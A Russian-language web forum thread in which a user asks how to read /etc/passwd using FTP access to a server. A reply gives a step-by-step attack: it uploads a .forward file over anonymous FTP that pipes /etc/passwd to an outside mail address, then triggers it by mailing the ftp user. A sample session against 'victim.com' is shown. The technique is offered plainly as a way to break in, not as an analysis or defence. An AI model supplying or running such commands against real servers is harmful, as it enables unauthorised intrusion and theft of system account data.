October 16 2024 06:53:10
Навигация
· Генеральная

· Материнские платы
· Контроллеры
· CPU - процессоры
· Память - RAM
· Видеокарты
· HDD, SSD, FDD
· CD - DVD - BD
· Звуковые карты
· Охлаждение ПК
· Корпуса ПК
· Электропитание
· Мониторы и ТВ
· Манипуляторы
· Ноутбуки, десктопы

· Интернет
· Принт и скан
· Фото-видео
· Мультимедиа
· Компьютеры - общая
· Программное
· Игры ПК
· Радиодело
· Производители

· Динамики, микрофоны
· Аппаратура

· Телевидение
· Безопасность
· Электроника / Быт
· Телефония
· Пульты - ПДУ
· Создание сайтов

· О сайте wasp.kz...

· Каталог ссылок
Последние статьи
· До последнего англич...
· ЮАР - нефть - 1982 год
· Простой парень
· ВДВ Израиля - форма
· Казахстан: экспорт, ...
Счетчики


Яндекс цитирования

Яндекс.Метрика

- Темы форума
- Комментарии
Просмотр темы
WASP.kz » ИНТЕРНЕТ, ЛОКАЛЬНЫЕ СЕТИ, САЙТЫ » Создание сайтов
 Распечатать тему
Как прочитать /etc/passwd?
Nevillberger
Как бы мне, имея FТР-доступ к серверу, прочитать /etc/passwd?

Тебе для этого необходимо выполнить следующий ftp-сценарий со своего сервера


Скачать исходники  Код
bash# cat myforward_file
"cat /etc/passwd | /bin/mail hacker© mail.ru "
bash# ftp victim.com
Connected to victim.com
220 victim FTP server ready Name (victim.com:hacker):ftp 331 Guest login ok, send you e-mail as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -l
220 PORT command succesful.
150 Opening ASCII mode data connection for '/bin/
Is'. (192.168.1.1, 2335) (0 bytes) total 4
dr-xr-xr-x 2 root operator 512 Feb 28 2000 bin
dr-xr-xr-x 2 root operator 512 Sep 18 2000 etc
drwxrwxrwt 13 root operator 1024 Jul 1 00:55 incoming
drwxr-xr-x 3 root operator 512 Feb 19 10:25 pub
226 Transfer complete.
ftp>put myforward_file .forward
ftp>quit
bash# echo 'You a hacked' | mail ftp© victim.com




В итоге, когда почту отошлют юзеру ftр, выполнится .forward-файл. Если у демона будет достаточно прав для чтения/etc/passwd, то его содержимое придет к тебе на мыло


*
Изменил(а) wasp, 19-06-2024 12:11
 
Kolmar-X
Вот так вот весь вред в мире!
 
Перейти на форум:
Авторизация
Логин

Пароль



Вы не зарегистрированы?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Реклама Google




Время загрузки: 0.11 секунд - 19 Запросов 86,991,176 уникальных посетителей